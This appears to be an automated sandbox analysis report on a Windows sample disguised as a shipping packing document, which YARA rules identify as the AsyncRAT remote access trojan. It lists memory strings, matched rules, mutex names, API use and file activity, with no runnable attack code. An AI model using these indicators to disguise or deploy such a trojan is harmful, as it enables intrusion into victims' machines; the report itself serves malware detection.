Source: powershell.exe, 00000004.00000002.2122523697.00000000072D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000009.00000002.2209439347.0000000007219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000004.00000002.2123040891.0000000007365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000007.00000002.2167832641.0000000008922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsofts
Source: powershell.exe, 00000004.00000002.2116994219.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2160747319.0000000005FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2201275133.0000000005748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2244028681.0000000005226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2107616317.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.00000000050C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.0000000005297000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4525682109.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2107616317.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2107616317.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.00000000050C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.0000000005297000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, XClient.exe.3.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: powershell.exe, 0000000C.00000002.2244028681.0000000005226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2107616317.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.2244028681.0000000005226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2151007476.000000000575A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.00000000058CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2116994219.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2160747319.0000000005FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2201275133.0000000005748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F2CA8 NtQueryInformationProcess,		0_2_097F2CA8
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F2CA0 NtQueryInformationProcess,		0_2_097F2CA0

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_014FD304	0_2_014FD304
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_08DD1BC0	0_2_08DD1BC0
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_0903A158	0_2_0903A158
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_090399F0	0_2_090399F0
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_0903F3F8	0_2_0903F3F8
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_0903CC68	0_2_0903CC68
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_09036310	0_2_09036310
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_09036578	0_2_09036578
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F0040	0_2_097F0040
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F5020	0_2_097F5020
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F33FC	0_2_097F33FC
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097FDB18	0_2_097FDB18
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097FDB08	0_2_097FDB08
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097FBC00	0_2_097FBC00
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F2E28	0_2_097F2E28
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097FC038	0_2_097FC038
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F5018	0_2_097F5018
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F20B8	0_2_097F20B8
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F52B0	0_2_097F52B0
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F52AB	0_2_097F52AB
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097F2578	0_2_097F2578
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097FB7C8	0_2_097FB7C8
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 0_2_097FD6E0	0_2_097FD6E0
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 3_2_02906225	3_2_02906225
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 3_2_029044D0	3_2_029044D0
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 3_2_02904AC8	3_2_02904AC8
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 3_2_02901458	3_2_02901458
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Code function: 3_2_02901A70	3_2_02901A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_02D9B490	4_2_02D9B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_02D91364	4_2_02D91364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_02D9C662	4_2_02D9C662
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_02D9B470	4_2_02D9B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_07550CE8	4_2_07550CE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_086C3E98	4_2_086C3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04DBB4A0	7_2_04DBB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04DBB490	7_2_04DBB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08DE3A98	7_2_08DE3A98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0462B490	9_2_0462B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0462C64F	9_2_0462C64F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04DCB490	12_2_04DCB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04DCB470	12_2_04DCB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_08E43E98	12_2_08E43E98

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000000.00000002.2055140425.0000000008D20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000000.00000002.2053829045.0000000004C25000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000000.00000002.2051999116.00000000015EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4542241107.0000000005C69000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4539662879.0000000003A81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamezOCS.exe> vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Binary or memory string: OriginalFilenamezOCS.exe> vs PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XClient.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, evBSdWeBEycC8.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, evBSdWeBEycC8.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 3QiiXqkghrMk1.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, gtv0gssvKWWRAOg38T65o.cs	Base64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, gtv0gssvKWWRAOg38T65o.cs	Base64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, J5o4JL0ENemqPugCy1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, J5o4JL0ENemqPugCy1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, YDMP6WKRt6Ugl0371L.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, J5o4JL0ENemqPugCy1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/21@0/1

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\XczLagvCjDnYaiUQ

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File read: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe"
